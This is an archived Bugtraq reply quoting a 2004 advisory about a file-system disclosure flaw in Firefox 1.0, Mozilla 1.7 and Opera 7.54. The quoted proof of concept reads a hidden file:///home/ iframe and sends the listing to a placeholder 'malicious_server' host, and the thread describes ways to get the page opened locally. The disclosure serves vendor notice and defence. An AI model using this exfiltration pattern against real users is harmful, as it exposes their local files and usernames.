Movatterモバイル変換

[0]ホーム
URL:

Home page logo
bugtraq logo

Bugtraqmailing list archives

PreviousBy DateNext
PreviousBy ThreadNext

Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:

From: Liu Die Yu <liudieyu () umbrella name>
Date: Thu, 02 Dec 2004 09:49:06 +0800
Target user doesn't need to click the OPEN button:
1. Cross-site scripting vulnerabilities can get it done(on Mozilla, aninternet page can't navigate to a local page directly ... but there areways to bypass this restriction).2. Ask target to open an HTML file in a remote SMBFS folder - expectinghim to
mount -t smbfs [...] /mnt/[...]and open "/mnt/[...].html" in Mozilla :-)
Attacker can *browse* target's folders and files(file content, filename,filesize, and even the date).
==========http://editive.com/referrerGiovanni Delvecchio wrote:
Title: Disclosure of file system information in Mozilla Firefox andOpera Browser
Note:
I don't know if it could be considered really a security problem,anyway i'll try to explain my ideas.
Sorry for my bad english.Author: Giovanni DelvecchioBug: Disclosure of file system informationApplications affected:- Firefox 1.0- Mozilla 1.7- Opera 7.54 (*)( maybe also previous versions )Tested versions:- Firefox 1.0 on Linux and Windows- Mozilla 1.7 on Windows- Opera 7.51,..7.54 on LinuxNote:
The content of this advisory could be applied also to other browsers,i have checked just Mozilla, Firefox,Opera and Microsoft InternetExplorer.
Microsoft Internet Explorer seems not to be affected.Bug Description:================
A problem exist in some browsers where a frame can gain access toattributes of another frame or iframe.An application of this bug could be the possibility to disclose localdirectory structure.
PoC:===------ begin code.htm -----<html><body onLoad=" list_files=''; for(i=0;i<local_files.document.links.length;i++)          {list_files+=local_files.document.links.item(i);} alert(list_files); //send list_files at malicious_server
document.location.href='http://malicious_server/grab.php?list='+list_files;
             "><iframe name="local_files" src="file:///home/" height=0width=0></iframe></body></html>------ end of code.htm -------Impact:======
A malicious server could obtain the content of /home/ directory ( orc:\Document and Setting\ for windows system ) and so know a set ofusernames present on system target.Moreover, colud be possible know if a particolar program is installedon target system for a succesive attack.
Anyway it cannot be exploited "directly" by a remote site, but only ifthe page is opened from a local path ( file://localpath/code.htm),since the iframe "local_files" belongs to a local domain.
Note: with Internet Explorer code.htm doesn't work even in local.Possible Remote Exploitation:========================Question:How could a malicious remote user exploit it ?Answer:
After that the user "victim" has requiredhttp://maliciuos_server/code.htm, if malicious_server responds with apage containing an unknown Content-Type field ( for example text/html.,note the dot) ,the browser will show a dialog window with someoptions (open, save, cancel). Choosing "Open" to view this page, itwill be downloaded and opened in local ; javascript code will beexecuted in local context.
Obviously, if user chooses to save and after open it the result is equal.
(*) For Opera this  method of remote exploitation requires that operamust be setted as Default Application in "handler for saved files"whether the user choose "Open" in the dialog window.
Solution:========No solution at the momentVendor notice==============24th November 2004: I have contacted mozilla by security () mozilla organd Opera by its bug track page athttps://bugs.opera.com/wizard/No response from both at the moment.Best regards,Giovanni Delvecchio_________________________________________________________________
Personalizza MSN Messenger con sfondi e fotografie!http://www.ilovemessenger.msn.it/
.
PreviousBy DateNext
PreviousBy ThreadNext
Current thread:




[8]ページ先頭


©2009-2026 Movatter.jp